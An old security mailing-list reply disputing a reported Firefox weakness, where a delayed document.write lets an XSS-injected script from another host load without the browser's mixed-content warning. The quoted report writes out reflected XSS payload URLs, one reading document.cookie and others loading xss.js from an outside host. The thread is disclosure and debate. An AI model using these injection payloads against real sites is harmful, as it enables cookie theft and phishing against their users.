Dear Michal Majchrowicz,
This feature is not intended to protect against XSS, it's only intended
to inform you some information is transmitted in cleartext. You can
simply change
src="http://server2.com/xss.js
to
src="https://server2.com/xss.js
to avoid this message.
--Wednesday, April 4, 2007, 3:29:14 PM, you wrote to
full-disclosure@lists.grok.org.uk:
MM> When user visits sites over HTTPS protocol he is informed by the Web
MM> Browser everytime the site tries to load unsecured (using HTTP
MM> protocol) element (script/iframe/object etc.).
MM> So for instance if we have XSS vulnerable site
MM> https://server.com/vuln.php?id=";><script>alert(document.cookie);</script>
MM> Everybrowser will execute it without any complains since they cannot
MM> know where the code comes from. But this example will cause a warning:
MM> https://server.com/vuln.php?id=";><script
MM> src="http://server2.com/xss.js";></script>
MM> Web Browser knows that we are trying to load something over unsecure
protocol.
MM> However Mozilla Firefox will fail with the following example and the
MM> user will think that all the elements are "safe":
MM> https://server.com/vuln.php?id=";><script>setTimeout("document.write('<script
MM> src=http://server2.com/xss.js></script>',10000)"</script>
MM> The "insecure element" will be added after Web Browser performs
MM> checking therefore allowing for instance phising attacks. Internet
MM> Explorer is not vulnerable to this issue. Other Web Browser weren't
MM> tested.
MM> _______________________________________________
MM> Full-Disclosure - We believe in it.
MM> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
MM> Hosted and sponsored by Secunia - http://secunia.com/
--
~/ZARAZA http://securityvulns.com/
Машина оказалась способной к единственному действию,
а именно умножению 2x2, да и то при этом ошибаясь. (Лем)
|